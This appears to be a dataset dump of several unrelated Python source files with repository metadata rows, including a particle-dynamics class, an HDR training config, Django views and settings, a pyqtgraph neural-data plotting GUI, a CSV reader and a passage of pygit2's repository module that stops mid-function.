Return kinetic energy as
1/2*mass*vel^2
"""
return 0.5*self.mass*self.velocity**2
# Time integration methods
def leap_velocity(self, dt, force):
"""
First-order velocity update,
v(t+dt) = v(t) + dt*F(t)
:param dt: timestep as float
:param force: force on particle as float
"""
self.velocity += dt*force/self.mass
def leap_pos1st(self, dt):
"""
First-order position update,
x(t+dt) = x(t) + dt*v(t)
:param dt: timestep as float
"""
self.position += dt*self.velocity
def leap_pos2nd(self, dt, force):
"""
Second-order position update,
x(t+dt) = x(t) + dt*v(t) + 1/2*dt^2*F(t)
:param dt: timestep as float
:param force: current force as float
"""
self.position += dt*self.velocity + 0.5*dt**2*force/self.mass
hey = Particle1D()
print(hey.position)
| [
"plasmolian@gmail.com"
] | plasmolian@gmail.com |
d2797398c8da6c4fb49aafc3d736a1391d150f12 | b6f0b3932f8cdee542f3f1fe7f5c27c67e5d1c2d | /conf/train_conf_dense_7.py | 1c88e9db0a9644002cbed124c0e05c35b5d75b9d | [] | no_license | fuding/codes_for_sicheng | dcab85b66d9f3a0f0c78c5e471223d919a3d14f7 | c8ba21572921ba0aa9686174305ab48fa614cd5d | refs/heads/master | 2022-02-26T16:32:01.253870 | 2019-10-11T06:10:27 | 2019-10-11T06:10:27 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,453 | py | from easydict import EasyDict
def get_config():
conf = EasyDict()
conf.arch = "dense_7"
conf.model = "MultiHDR"
conf.model_name = conf.arch + ""
conf.use_cpu = False
conf.is_train = True
conf.gpu_ids = [0]
conf.epoch = 400
conf.start_epoch = 0
conf.learning_rate = 0.0002
conf.beta1 = 0.5
conf.loss = 'l2' # l1 or l2
conf.lr_scheme = "MultiStepLR"
conf.lr_steps = [100 * 2387]
conf.lr_gamma = 0.1
conf.dataset_dir = "/home/sicheng/data/hdr/multi_ldr_hdr_patch/"
conf.exp_path = "/home/sicheng/data/hdr/multi_ldr_hdr_patch/exp.json"
conf.dataset_name = 'Multi_LDR_HDR'
conf.batch_size = 8
conf.load_size = 256
conf.fine_size = 256
conf.c_dim = 3
conf.num_shots = 3
conf.n_workers = 4
conf.use_shuffle = True
conf.use_tb_logger = True
conf.experiments_dir = "../../experiments/" + conf.model_name
conf.log_dir = "../../tb_logger/" + conf.model_name
conf.save_freq = 2000
conf.print_freq = 200
# conf.resume_step = 78000
# conf.pretrained = '/home/sicheng/program/High_Dynamic_Range/BasicHDR/experiments/' + conf.model_name + '/models/' + str(
# conf.resume_step) + '_G.pth'
# conf.resume = '/home/sicheng/program/High_Dynamic_Range/BasicHDR/experiments/' + conf.model_name + '/training_state/' + str(
# conf.resume_step) + '.state'
conf.pretrained = None
conf.resume = None
return conf | [
"907682447@qq.com"
] | 907682447@qq.com |
e7135cb72e171a176efe25678a61ae2c7c00da2f | e7e1dc27c9c6b844bb585d09c6660eb8877d0551 | /guodongba/views.py | 17993c976e4dfd1d562a36d34f30e6116fe8ac5c | [] | no_license | Guo-Dong-Ba-Team/guodongba-server | 362df7e47dcabd1cbae56829388c6844019b9f48 | 81727dc57d60e209d101bf5e88b22967824a310b | refs/heads/master | 2021-01-10T17:46:53.599733 | 2015-12-19T14:47:35 | 2015-12-19T14:47:35 | 44,010,066 | 1 | 0 | null | null | null | null | UTF-8 | Python | false | false | 184 | py | from django.shortcuts import render_to_response
def home_page(request):
return render_to_response('index.html')
def agreement(request):
return render_to_response('agreement.html')
| [
"wangyf11@mail.ustc.edu.cn"
] | wangyf11@mail.ustc.edu.cn |
e00c10016ee6c187142737795c5e17c68a17937a | 25022cc3cff8a31cead2dc17b5c40fef1f9825c2 | /0x03-python-data_structures/10-divisible_by_2.py | 7111e75bd74335da6bbb1af23df54257d2211d0a | [] | no_license | 821-N/holbertonschool-higher_level_programming | 699032f42d5a94065c63c453774c532945e5807c | bfd43a2919c1d2cf63d964a1ded41e2252e83ccd | refs/heads/master | 2020-07-23T18:38:49.325003 | 2020-02-14T04:56:43 | 2020-02-14T04:56:43 | 207,669,574 | 0 | 1 | null | null | null | null | UTF-8 | Python | false | false | 135 | py | #!/usr/bin/python3
def divisible_by_2(my_list=[]):
new = []
for item in my_list:
new += [item % 2 == 0]
return new
| [
"nathaniel.marofsky@gmail.com"
] | nathaniel.marofsky@gmail.com |
7c0dc62998969fe32e1394a1fe83e7c256fb1e99 | 4c1a5ae2d8cc13a2438fe8eac0529a1cb9fe847b | /server/settings.py | f0a074c8d677ac61c92dbbfe11c15c57e1f2da47 | [] | no_license | Alex2Pena/Docker-blog | 8d381d5ccf29b806ae8165109dbc4c9ccca085a3 | 6637f7ae7677b89e1005299279a2086e8c1691c7 | refs/heads/main | 2023-02-08T02:56:02.118544 | 2020-12-29T16:47:24 | 2020-12-29T16:47:24 | 323,504,916 | 0 | 0 | null | 2020-12-29T16:47:25 | 2020-12-22T02:57:41 | null | UTF-8 | Python | false | false | 3,485 | py | """
Django settings for server project.
Generated by 'django-admin startproject' using Django 3.1.4.
For more information on this file, see
https://docs.djangoproject.com/en/3.1/topics/settings/
For the full list of settings and their values, see
https://docs.djangoproject.com/en/3.1/ref/settings/
"""
from pathlib import Path
import environ
env = environ.Env(
# set casting, default value
DEBUG=(bool, False)
)
# reading .env file
environ.Env.read_env()
# Build paths inside the project like this: BASE_DIR / 'subdir'.
BASE_DIR = Path(__file__).resolve().parent.parent
# Quick-start development settings - unsuitable for production
# See https://docs.djangoproject.com/en/3.1/howto/deployment/checklist/
# SECURITY WARNING: keep the secret key used in production secret!
SECRET_KEY = env('SECRET_KEY')
# SECURITY WARNING: don't run with debug turned on in production!
DEBUG = env('DEBUG', False)
ALLOWED_HOSTS = tuple(env.list('ALLOWED_HOSTS'))
# Application definition
INSTALLED_APPS = [
'django.contrib.admin',
'django.contrib.auth',
'django.contrib.contenttypes',
'django.contrib.sessions',
'django.contrib.messages',
'django.contrib.staticfiles',
# My Apps
'notes.apps.NotesConfig',
]
MIDDLEWARE = [
'django.middleware.security.SecurityMiddleware',
'django.contrib.sessions.middleware.SessionMiddleware',
'django.middleware.common.CommonMiddleware',
'django.middleware.csrf.CsrfViewMiddleware',
'django.contrib.auth.middleware.AuthenticationMiddleware',
'django.contrib.messages.middleware.MessageMiddleware',
'django.middleware.clickjacking.XFrameOptionsMiddleware',
]
ROOT_URLCONF = 'server.urls'
TEMPLATES = [
{
'BACKEND': 'django.template.backends.django.DjangoTemplates',
'DIRS': [],
'APP_DIRS': True,
'OPTIONS': {
'context_processors': [
'django.template.context_processors.debug',
'django.template.context_processors.request',
'django.contrib.auth.context_processors.auth',
'django.contrib.messages.context_processors.messages',
],
},
},
]
WSGI_APPLICATION = 'server.wsgi.application'
# Database
# https://docs.djangoproject.com/en/3.1/ref/settings/#databases
DATABASES = {
# 'default': {
# 'ENGINE': 'django.db.backends.sqlite3',
# 'NAME': BASE_DIR / 'db.sqlite3',
# }
'default': {
'ENGINE': 'django.db.backends.postgresql',
'NAME': env('DB_NAME'),
'USER': env('DB_USER'),
'PASSWORD': env('DB_PASSWORD'),
'HOST': 'db',
'PORT': 5432,
}
}
# Password validation
# https://docs.djangoproject.com/en/3.1/ref/settings/#auth-password-validators
AUTH_PASSWORD_VALIDATORS = [
{
'NAME': 'django.contrib.auth.password_validation.UserAttributeSimilarityValidator',
},
{
'NAME': 'django.contrib.auth.password_validation.MinimumLengthValidator',
},
{
'NAME': 'django.contrib.auth.password_validation.CommonPasswordValidator',
},
{
'NAME': 'django.contrib.auth.password_validation.NumericPasswordValidator',
},
]
# Internationalization
# https://docs.djangoproject.com/en/3.1/topics/i18n/
LANGUAGE_CODE = 'en-us'
TIME_ZONE = 'UTC'
USE_I18N = True
USE_L10N = True
USE_TZ = True
# Static files (CSS, JavaScript, Images)
# https://docs.djangoproject.com/en/3.1/howto/static-files/
STATIC_URL = '/static/'
| [
"attn.alex.p@gmail.com"
] | attn.alex.p@gmail.com |
83b668e0c8e813fb1fa0f21402c55b6211e0113c | 15ec2f9208d011097a02fd997df0fedd3c6311a1 | /data_exploration_gui/plot.py | 82534ae177b9af5a8ffa3ff7054f6337da908353 | [
"MIT"
] | permissive | int-brain-lab/iblapps | 95110bec8b9de2e1e41808086897ac0cd663d59c | e3e5a90fd4c60ef94fc87dd60f9de0307b51ab5f | refs/heads/master | 2023-08-09T14:48:01.876042 | 2023-07-25T09:34:14 | 2023-07-25T09:34:14 | 233,610,481 | 13 | 13 | MIT | 2023-09-01T10:02:17 | 2020-01-13T14:09:51 | Python | UTF-8 | Python | false | false | 15,749 | py | from PyQt5 import QtGui
import pyqtgraph as pg
import pyqtgraph.dockarea
from data_exploration_gui.utils import (MAP_SORT_OPTIONS, MAP_SIDE_OPTIONS, MAP_CHOICE_OPTIONS,
PSTH_OPTIONS, RASTER_OPTIONS, colours)
import atlaselectrophysiology.ColorBar as cb
import numpy as np
class PlotGroup:
def __init__(self, data_model):
self.data = data_model
self.create_dock_area()
self.fig_spike_psth = PlotTemplate('Time After Event (s)', 'Firing Rate (Hz)')
self.fig1_area.addWidget(self.fig_spike_psth.fig)
self.fig_behav_psth = PlotTemplate('Time After Event (s)', 'Firing Rate (Hz)')
self.fig2_area.addWidget(self.fig_behav_psth.fig)
self.fig_spike_raster = ScatterTemplate('Time After Event (s)', 'No. of Trials')
self.fig3_area.addWidget(self.fig_spike_raster.fig)
self.fig_behav_raster = ImageTemplate('Time After Event (s)', 'No. of Trials')
self.fig4_area.addWidget(self.fig_behav_raster.fig)
self.fig_autocorr = BarTemplate('Time (ms)', 'Corr')
self.fig5_area.addWidget(self.fig_autocorr.fig)
self.fig_template = PlotTemplate('Time (ms)', 'V (uV)')
self.fig6_area.addWidget(self.fig_template.fig)
self.plot_status = {key: False for key in MAP_SORT_OPTIONS.keys()}
def create_dock_area(self):
self.fig_area = pg.dockarea.DockArea()
self.fig1_area = pg.dockarea.Dock('', autoOrientation='horizontal')
self.fig2_area = pg.dockarea.Dock('', autoOrientation='horizontal')
self.fig3_area = pg.dockarea.Dock('', autoOrientation='horizontal')
self.fig4_area = pg.dockarea.Dock('', autoOrientation='horizontal')
self.fig5_area = pg.dockarea.Dock('', autoOrientation='horizontal')
self.fig6_area = pg.dockarea.Dock('', autoOrientation='horizontal')
self.fig_area.addDock(self.fig2_area, 'top')
self.fig_area.addDock(self.fig1_area, 'left', self.fig2_area)
self.fig_area.addDock(self.fig3_area, 'bottom', self.fig1_area)
self.fig_area.addDock(self.fig4_area, 'bottom', self.fig2_area)
self.fig_area.addDock(self.fig5_area, 'right')
self.fig_area.addDock(self.fig6_area, 'bottom', self.fig5_area)
self.fig3_area.setStretch(x=1, y=18)
self.fig4_area.setStretch(x=1, y=18)
self.fig5_area.setStretch(x=10, y=1)
self.fig6_area.setStretch(x=10, y=1)
def change_rasters(self, trial_set, contrast, order, sort, hold, event):
side = MAP_SIDE_OPTIONS[trial_set]
choice = MAP_CHOICE_OPTIONS[trial_set]
if hold and trial_set != 'all':
spike_raster, behav_raster = self.data.get_rasters_for_selection('all', 'all', order,
sort, contrast, event)
raster_options = RASTER_OPTIONS['all'][sort]
else:
spike_raster, behav_raster = self.data.get_rasters_for_selection(side, choice, order,
sort, contrast, event)
raster_options = RASTER_OPTIONS[trial_set][sort]
self.fig_spike_raster.remove_regions()
self.fig_spike_raster.plot(spike_raster.raster, spike_raster.time, spike_raster.n_trials)
self.fig_spike_raster.add_regions(spike_raster.dividers, raster_options)
self.fig_behav_raster.remove_regions()
self.fig_behav_raster.plot(behav_raster.raster, behav_raster.time, cmap=behav_raster.cmap,
clevels=behav_raster.clevels)
self.fig_behav_raster.add_regions(behav_raster.dividers, raster_options)
def change_psths(self, trial_set, contrast, order, sort, event):
side = MAP_SIDE_OPTIONS[trial_set]
choice = MAP_CHOICE_OPTIONS[trial_set]
spike_psth, behav_psth = self.data.get_psths_for_selection(side, choice, order,
sort, contrast, event)
self.fig_spike_psth.plot(trial_set, spike_psth.time, spike_psth.psth_mean,
spike_psth.psth_std, PSTH_OPTIONS[trial_set],
ylabel=spike_psth.ylabel)
self.fig_behav_psth.plot(trial_set, behav_psth.time, behav_psth.psth_mean,
behav_psth.psth_std, PSTH_OPTIONS[trial_set],
ylabel=behav_psth.ylabel)
def change_plots(self, contrast, trial_set, order, sort, hold, event):
self.plot_status[trial_set] = True
if not hold:
self.remove_plots(self.prev_trial_set)
self.change_rasters(trial_set, contrast, order, sort, hold, event)
self.change_psths(trial_set, contrast, order, sort, event)
self.prev_trial_set = trial_set
def change_all_plots(self, contrast, trial_set, order, sort, hold, event):
n_plots = np.sum(list(self.plot_status.values()))
if n_plots == 0:
self.change_psths(trial_set, contrast, order, sort, event)
self.plot_status[trial_set] = True
else:
for key, val in self.plot_status.items():
if val:
self.remove_plots(key)
self.change_psths(key, contrast, order, sort, event)
self.plot_status[key] = True
self.change_rasters(trial_set, contrast, order, sort, hold, event)
autocorr = self.data.get_autocorr_for_selection()
self.fig_autocorr.plot(autocorr.time, autocorr.vals)
template = self.data.get_template_for_selection()
self.fig_template.plot_line(template.time, template.vals)
self.prev_trial_set = trial_set
def remove_plots(self, trial_set):
self.plot_status[trial_set] = False
self.fig_spike_psth.remove_item(trial_set)
self.fig_behav_psth.remove_item(trial_set)
def reset(self):
for key, val in self.plot_status.items():
if val:
self.remove_plots(key)
self.fig_spike_raster.reset()
self.fig_behav_raster.reset()
self.fig_autocorr.reset()
class PlotTemplate:
def __init__(self, xlabel, ylabel, single=True):
self.fig = pg.PlotWidget(background='w')
self.fig.setMouseEnabled(x=False, y=False)
self.fig.setLabel('bottom', xlabel)
self.fig.setLabel('left', ylabel)
self.plot_items = dict()
if single:
self.plot_item = pg.PlotCurveItem()
self.fig.addItem(self.plot_item)
else:
self.fig.plotItem.addLine(x=0, pen=colours['line'])
def add_item(self, trial_set, yrange):
if trial_set not in self.plot_items.keys():
curve = {'centre': pg.PlotCurveItem(),
'upper': pg.PlotCurveItem(),
'lower': pg.PlotCurveItem(),
'fill': pg.FillBetweenItem(),
'yrange': yrange}
self.plot_items[trial_set] = curve
self.fig.addItem(self.plot_items[trial_set]['centre'])
self.fig.addItem(self.plot_items[trial_set]['fill'])
def remove_item(self, trial_set):
self.fig.removeItem(self.plot_items[trial_set]['centre'])
self.fig.removeItem(self.plot_items[trial_set]['fill'])
self.plot_items.pop(trial_set)
def plot(self, trial_set, x, y, se, plot_info, ylabel=None):
self.add_item(trial_set, [np.nanmin(y - se), np.nanmax(y + se)])
self.plot_items[trial_set]['centre'].setData(x=x, y=y)
self.plot_items[trial_set]['centre'].setPen(plot_info['colour'])
self.plot_items[trial_set]['lower'].setData(x=x, y=y - se)
self.plot_items[trial_set]['upper'].setData(x=x, y=y + se)
self.plot_items[trial_set]['fill'].setCurves(self.plot_items[trial_set]['upper'],
self.plot_items[trial_set]['lower'])
plot_info['fill'].setAlpha(50)
self.plot_items[trial_set]['fill'].setBrush(plot_info['fill'])
# find the correct y range based on all the lines on the plot
y_min = np.nanmin([val['yrange'][0] for _, val in self.plot_items.items()])
y_max = np.nanmax([val['yrange'][1] for _, val in self.plot_items.items()])
self.fig.setXRange(min=np.min(x), max=np.max(x))
self.fig.setYRange(min=0.95 * y_min, max=1.05 * y_max)
if ylabel is not None:
self.fig.setLabel('left', ylabel)
def plot_line(self, x, y):
self.plot_item.setData(x=x, y=y)
self.plot_item.setPen('b')
self.fig.setXRange(min=np.min(x), max=np.max(x))
self.fig.setYRange(min=0.95 * np.min(y), max=1.05 * np.max(y))
class ImageTemplate:
def __init__(self, xlabel, ylabel):
self.fig = pg.PlotWidget(background='w')
self.fig.setLabel('bottom', xlabel)
self.fig.setLabel('left', ylabel)
self.fig.scene().sigMouseMoved.connect(self.on_mouse_hover)
self.image = pg.ImageItem()
self.fig.addItem(self.image)
self.fig.plotItem.addLine(x=0, pen=colours['line'])
self.text_popup = pg.TextItem(color=colours['line'])
font = QtGui.QFont()
font.setPointSize(8)
font.setBold(True)
self.text_popup.setFont(font)
self.text_popup.hide()
self.fig.addItem(self.text_popup)
self.region_items = []
self.regions = None
self.region_text = None
def reset(self):
self.image.setImage()
def plot(self, image, t, cmap='binary', clevels=(0, 1)):
# TODO makes sure this is in the order that you expect!!!
self.image.setImage(image.T)
self.x_range = [np.min(t), np.max(t)]
self.x_scale = (np.max(t) - np.min(t)) / image.shape[1]
transform = [self.x_scale, 0., 0., 0., 1., 0., np.min(t),
0., 1.]
self.image.setTransform(QtGui.QTransform(*transform))
color_bar = cb.ColorBar(cmap)
lut = color_bar.getColourMap()
self.image.setLookupTable(lut)
self.image.setLevels(clevels)
self.fig.setXRange(min=np.min(t), max=np.max(t))
self.fig.setYRange(min=0, max=image.shape[0])
def add_regions(self, regions, region_info):
self.regions = regions
self.region_text = region_info['text']
for reg, col in zip(self.regions, region_info['colours']):
# Hack so we can easily revert to the coloured option if users prefer
col.setAlpha(0)
region = pg.LinearRegionItem(values=(reg[0], reg[1]), brush=col, pen=colours['line'],
movable=False, orientation='horizontal')
self.fig.plotItem.addItem(region)
self.region_items.append(region)
def remove_regions(self):
for reg in self.region_items:
self.fig.plotItem.removeItem(reg)
def on_mouse_hover(self, pos):
if len(self.regions) > 0:
pos = self.image.mapFromScene(pos)
# only show if mouse is in x range
if ((pos.x() * self.x_scale) + self.x_range[0] > self.x_range[0]) & \
((pos.x() * self.x_scale) + self.x_range[0] < self.x_range[1]):
if (pos.y() > np.min(np.min(self.regions))) & \
(pos.y() < np.max(np.max(self.regions))):
text = self.find_text(pos.y())
self.text_popup.setText(text)
self.text_popup.setPos((pos.x() * self.x_scale) + self.x_range[0] + 0.05,
pos.y() - 10)
self.text_popup.show()
else:
self.text_popup.hide()
else:
self.text_popup.hide()
else:
self.text_popup.hide()
def find_text(self, y):
idx = [i for i, val in enumerate(self.regions) if (y > val[0]) & (y < val[1])][0]
return self.region_text[idx]
class ScatterTemplate:
def __init__(self, xlabel, ylabel):
self.fig = pg.PlotWidget(background='w')
self.fig.setLabel('bottom', xlabel)
self.fig.setLabel('left', ylabel)
self.fig.scene().sigMouseMoved.connect(self.on_mouse_hover)
self.scatter = pg.ScatterPlotItem()
self.fig.addItem(self.scatter)
self.fig.plotItem.addLine(x=0, pen=colours['line'])
self.text_popup = pg.TextItem(color=colours['line'])
font = QtGui.QFont()
font.setPointSize(8)
font.setBold(True)
self.text_popup.setFont(font)
self.text_popup.hide()
self.fig.addItem(self.text_popup)
self.region_items = []
self.regions = None
self.region_text = None
def reset(self):
self.scatter.setData()
def plot(self, scatter, t, n_trials):
self.scatter.setData(x=scatter[:, 0], y=scatter[:, 1], size=1, symbol='s')
self.scatter.setPen('k')
self.fig.setXRange(min=t[0], max=t[1])
self.fig.setYRange(min=0, max=n_trials)
self.x_range = t
def add_regions(self, regions, region_info):
self.regions = regions
self.region_text = region_info['text']
for reg, col in zip(self.regions, region_info['colours']):
# Hack so we can easily revert to the coloured option if users prefer
col.setAlpha(0)
region = pg.LinearRegionItem(values=(reg[0], reg[1]), brush=col, pen=colours['line'],
movable=False, orientation='horizontal')
self.fig.plotItem.addItem(region)
self.region_items.append(region)
def remove_regions(self):
for reg in self.region_items:
self.fig.plotItem.removeItem(reg)
def on_mouse_hover(self, pos):
if len(self.regions) > 0:
pos = self.scatter.mapFromScene(pos)
# only show if mouse is in x range
if (pos.x() > self.x_range[0]) & (pos.x() < self.x_range[1]):
if (pos.y() > np.min(np.min(self.regions))) & \
(pos.y() < np.max(np.max(self.regions))):
text = self.find_text(pos.y())
self.text_popup.setText(text)
self.text_popup.setPos(pos.x() + 0.05, pos.y() - 10)
self.text_popup.show()
else:
self.text_popup.hide()
else:
self.text_popup.hide()
else:
self.text_popup.hide()
def find_text(self, y):
idx = [i for i, val in enumerate(self.regions) if (y > val[0]) & (y < val[1])][0]
return self.region_text[idx]
class BarTemplate:
def __init__(self, xlabel, ylabel):
self.fig = pg.PlotWidget(background='w')
self.fig.setMouseEnabled(x=False, y=False)
self.fig.setLabel('bottom', xlabel)
self.fig.setLabel('left', ylabel)
self.bar = pg.BarGraphItem(x=[0], height=[0], width=0)
self.fig.addItem(self.bar)
def reset(self):
self.bar.setOpts(x=[0], height=[0], width=0)
def plot(self, x, y):
self.fig.setXRange(min=np.min(x), max=np.max(x))
self.fig.setYRange(min=0, max=1.05 * np.max(y))
self.bar.setOpts(x=x, height=y, width=0.0009, brush='b')
| [
"mayo.faulkner@ucl.ac.uk"
] | mayo.faulkner@ucl.ac.uk |
bfd9671d940ff8189d3a8359ad4ba293d4df4e8d | 99507b26eb81315c8369ae95ef5c8d0ab816b50c | /assignment_Q14.py | dd9bb12ca6f006a6eb2b4e671efacba89c18aa29 | [] | no_license | sprajwol/python_assignment_II | 19d4f4807df4edb30e154ed527e4671f2eb88463 | cd9b0fc6cacc150e73e447f8884196a4959a1f88 | refs/heads/master | 2022-11-14T17:18:03.274873 | 2020-07-05T17:00:00 | 2020-07-05T17:00:00 | 276,271,587 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 527 | py | # 14. Write a function that reads a CSV file. It should return a list of
# dictionaries, using the first row as key names, and each subsequent
# row as values for those keys.
# For the data in the previous example it would return:
# [{'name': 'George', 'address': '4312 Abbey Road', 'age': 22}, {'name':
# 'John', 'address': '54 Love Ave', 'age': 21}]
import csv
with open('file.csv', 'r') as file:
reader = csv.DictReader(file)
result = []
for each_row in reader:
result.append(each_row)
print(result)
| [
"shakyaprajwol96@gmail.com"
] | shakyaprajwol96@gmail.com |
848af6d597acad3a8cac069ab9fa0f6804f89c32 | 6ae1d088d8849459cccfe35c27a76e28f3883130 | /venv/Lib/site-packages/pygit2/repository.py | a7180f9b0626c6fe18c0d62f0c5250ae98075a47 | [] | no_license | salmans71/python | 8ac91cd985b19fa8d67c8b73ea98ce208cc36ee2 | 9957967fe34d623a885dde699fd7b5cdcf0b8d07 | refs/heads/master | 2023-01-03T23:35:23.867001 | 2020-10-31T15:08:48 | 2020-10-31T15:08:48 | 308,904,629 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 48,851 | py | # Copyright 2010-2020 The pygit2 contributors
#
# This file is free software; you can redistribute it and/or modify
# it under the terms of the GNU General Public License, version 2,
# as published by the Free Software Foundation.
#
# In addition to the permissions in the GNU General Public License,
# the authors give you unlimited permission to link the compiled
# version of this file into combinations with other programs,
# and to distribute those combinations without any restriction
# coming from the use of this file. (The General Public License
# restrictions do apply in other respects; for example, they cover
# modification of the file, and distribution when not linked into
# a combined executable.)
#
# This file is distributed in the hope that it will be useful, but
# WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU
# General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program; see the file COPYING. If not, write to
# the Free Software Foundation, 51 Franklin Street, Fifth Floor,
# Boston, MA 02110-1301, USA.
# Import from the Standard Library
from io import BytesIO
from string import hexdigits
import tarfile
from time import time
import warnings
# Import from pygit2
from ._pygit2 import Repository as _Repository, init_file_backend
from ._pygit2 import Oid, GIT_OID_HEXSZ, GIT_OID_MINPREFIXLEN
from ._pygit2 import GIT_CHECKOUT_SAFE, GIT_CHECKOUT_RECREATE_MISSING, GIT_DIFF_NORMAL
from ._pygit2 import GIT_FILEMODE_LINK
from ._pygit2 import GIT_BRANCH_LOCAL, GIT_BRANCH_REMOTE, GIT_BRANCH_ALL
from ._pygit2 import GIT_REF_SYMBOLIC
from ._pygit2 import Reference, Tree, Commit, Blob
from ._pygit2 import InvalidSpecError
from .callbacks import git_fetch_options
from .config import Config
from .errors import check_error
from .ffi import ffi, C
from .index import Index
from .remote import RemoteCollection
from .blame import Blame
from .utils import to_bytes, StrArray
from .submodule import Submodule
class BaseRepository(_Repository):
def __init__(self, *args, **kwargs):
super().__init__(*args, **kwargs)
self._common_init()
def _common_init(self):
self.branches = Branches(self)
self.references = References(self)
self.remotes = RemoteCollection(self)
# Get the pointer as the contents of a buffer and store it for
# later access
repo_cptr = ffi.new('git_repository **')
ffi.buffer(repo_cptr)[:] = self._pointer[:]
self._repo = repo_cptr[0]
# Backwards compatible ODB access
def read(self, *args, **kwargs):
"""read(oid) -> type, data, size
Read raw object data from the repository.
"""
return self.odb.read(*args, **kwargs)
def write(self, *args, **kwargs):
"""write(type, data) -> Oid
Write raw object data into the repository. First arg is the object
type, the second one a buffer with data. Return the Oid of the created
object."""
return self.odb.write(*args, **kwargs)
def __iter__(self):
return iter(self.odb)
def add_submodule(self, url, path, link=True, callbacks=None):
"""Add a submodule to the index.
Returns: the submodule that was added.
Parameters:
url
The URL of the submdoule.
path
The path within the parent repository to add the submodule
link
Should workdir contain a gitlink to the repo in .git/modules vs. repo directly in workdir.
"""
csub = ffi.new('git_submodule **')
curl = ffi.new('char[]', to_bytes(url))
cpath = ffi.new('char[]', to_bytes(path))
gitlink = 1 if link else 0
err = C.git_submodule_add_setup(csub, self._repo, curl, cpath, gitlink)
check_error(err)
submodule_instance = Submodule._from_c(self, csub[0])
# prepare options
opts = ffi.new('git_submodule_update_options *')
C.git_submodule_update_init_options(opts, C.GIT_SUBMODULE_UPDATE_OPTIONS_VERSION)
with git_fetch_options(callbacks, opts=opts.fetch_opts) as payload:
crepo = ffi.new('git_repository **')
err = C.git_submodule_clone(crepo, submodule_instance._subm, opts)
payload.check_error(err)
# clean-up the submodule repository
Repository._from_c(crepo[0], True)
err = C.git_submodule_add_finalize(submodule_instance._subm)
check_error(err)
return submodule_instance
def lookup_submodule(self, path):
"""
Lookup submodule information by name or path.
"""
csub = ffi.new('git_submodule **')
cpath = ffi.new('char[]', to_bytes(path))
err = C.git_submodule_lookup(csub, self._repo, cpath)
check_error(err)
return Submodule._from_c(self, csub[0])
def update_submodules(self, submodules=None, init=False, callbacks=None):
"""
Update a submodule. This will clone a missing submodule and checkout
the subrepository to the commit specified in the index of the
containing repository. If the submodule repository doesn't contain the
target commit (e.g. because fetchRecurseSubmodules isn't set), then the
submodule is fetched using the fetch options supplied in options.
"""
if submodules is None:
submodules = self.listall_submodules()
# prepare options
opts = ffi.new('git_submodule_update_options *')
C.git_submodule_update_init_options(opts, C.GIT_SUBMODULE_UPDATE_OPTIONS_VERSION)
with git_fetch_options(callbacks, opts=opts.fetch_opts) as payload:
i = 1 if init else 0
for submodule in submodules:
submodule_instance = self.lookup_submodule(submodule)
err = C.git_submodule_update(submodule_instance._subm, i, opts)
payload.check_error(err)
return None
#
# Mapping interface
#
def get(self, key, default=None):
value = self.git_object_lookup_prefix(key)
return value if (value is not None) else default
def __getitem__(self, key):
value = self.git_object_lookup_prefix(key)
if value is None:
raise KeyError(key)
return value
def __contains__(self, key):
return self.git_object_lookup_prefix(key) is not None
def __repr__(self):
return "pygit2.Repository(%r)" % self.path
#
# Remotes
#
def create_remote(self, name, url):
warnings.warn("Use repo.remotes.create(..)", DeprecationWarning)
return self.remotes.create(name, url)
#
# Configuration
#
@property
def config(self):
"""The configuration file for this repository.
If a the configuration hasn't been set yet, the default config for
repository will be returned, including global and system configurations
(if they are available).
"""
cconfig = ffi.new('git_config **')
err = C.git_repository_config(cconfig, self._repo)
check_error(err)
return Config.from_c(self, cconfig[0])
@property
def config_snapshot(self):
"""A snapshot for this repositiory's configuration
This allows reads over multiple values to use the same version
of the configuration files.
"""
cconfig = ffi.new('git_config **')
err = C.git_repository_config_snapshot(cconfig, self._repo)
check_error(err)
return Config.from_c(self, cconfig[0])
#
# References
#
def create_reference(self, name, target, force=False):
"""Create a new reference "name" which points to an object or to
another reference.
Based on the type and value of the target parameter, this method tries
to guess whether it is a direct or a symbolic reference.
Keyword arguments:
force
If True references will be overridden, otherwise (the default) an
exception is raised.
Examples::
repo.create_reference('refs/heads/foo', repo.head.target)
repo.create_reference('refs/tags/foo', 'refs/heads/master')
repo.create_reference('refs/tags/foo', 'bbb78a9cec580')
"""
direct = (
type(target) is Oid
or (
all(c in hexdigits for c in target)
and GIT_OID_MINPREFIXLEN <= len(target) <= GIT_OID_HEXSZ))
if direct:
return self.create_reference_direct(name, target, force)
return self.create_reference_symbolic(name, target, force)
def resolve_refish(self, refish):
"""Convert a reference-like short name "ref-ish" to a valid
(commit, reference) pair.
If ref-ish points to a commit, the reference element of the result
will be None.
Examples::
repo.resolve_refish('mybranch')
repo.resolve_refish('sometag')
repo.resolve_refish('origin/master')
repo.resolve_refish('bbb78a9')
"""
try:
reference = self.lookup_reference_dwim(refish)
except (KeyError, InvalidSpecError):
reference = None
commit = self.revparse_single(refish)
else:
commit = reference.peel(Commit)
return (commit, reference)
#
# Checkout
#
@staticmethod
def _checkout_args_to_options(strategy=None, directory=None, paths=None):
# Create the options struct to pass
copts = ffi.new('git_checkout_options *')
check_error(C.git_checkout_init_options(copts, 1))
# References we need to keep to strings and so forth
refs = []
# pygit2's default is SAFE | RECREATE_MISSING
copts.checkout_strategy = GIT_CHECKOUT_SAFE | GIT_CHECKOUT_RECREATE_MISSING
# and go through the arguments to see what the user wanted
if strategy:
copts.checkout_strategy = strategy
if directory:
target_dir = ffi.new('char[]', to_bytes(directory))
refs.append(target_dir)
copts.target_directory = target_dir
if paths:
strarray = StrArray(paths)
refs.append(strarray)
copts.paths = strarray.array[0]
return copts, refs
def checkout_head(self, **kwargs):
"""Checkout HEAD
For arguments, see Repository.checkout().
"""
copts, refs = Repository._checkout_args_to_options(**kwargs)
check_error(C.git_checkout_head(self._repo, copts))
def checkout_index(self, index=None, **kwargs):
"""Checkout the given index or the repository's index
For arguments, see Repository.checkout().
"""
copts, refs = Repository._checkout_args_to_options(**kwargs)
check_error(C.git_checkout_index(self._repo, index._index if index else ffi.NULL, copts))
def checkout_tree(self, treeish, **kwargs):
"""Checkout the given treeish
For arguments, see Repository.checkout().
"""
copts, refs = Repository._checkout_args_to_options(**kwargs)
